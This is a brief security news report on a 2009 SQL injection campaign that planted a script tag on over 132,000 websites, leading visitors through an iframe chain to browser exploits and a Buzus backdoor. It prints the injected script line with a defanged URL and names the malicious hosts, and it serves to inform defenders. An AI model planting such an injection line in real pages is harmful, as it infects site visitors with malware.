132,000+ Under SQL Injection Attack

A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009.

Infection sequence:
Injected iframe – <script src=hxxp://318x.com>
Executes a script that creates a new iframe to 318x.com/a.htm. That iframe (a.htm) does 2 things:

1. Loads a second iframe from aa1100.2288.org/htmlasp/dasp/alt.html
2. Loads a script: js.tongji.linezing.com/1358779/tongji.js (used for tracking).

The aa1100.2288.org/htmlasp/dasp/alt.html frame:

* Creates a third iframe pointing to aa1100.2288.org/htmlasp/dasp/share.html
* Loads a script: js.tongji.linezing.com/1364067/tongji.js (similar to above, but different number)
* If <noscript> it has an href tag that points to www.linezing.com with an img src of img.tongji.linezing.com/1364067/tongji.gif

The share.html detects browser type and writes/loads multiple iframes pointing to obfuscated script files located in the same directory (all are javascript regardless of extension). The combined action results in checks for MDAC, OWC10, and various versions of Adobe Flash. Depending on the results, the malcode then delivers one of several possible exploits.

Observed Exploits Include:
Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
Microsoft Office Web Components vulnerabilities described in MS09-043
Microsoft video ActiveX vulnerability described in MS09-032
Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.

Malware Description:
Threatname: Backdoor.Win32.Buzus.croo
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).

Source: Net-Security

Leave a Reply

Your email address will not be published. Required fields are marked *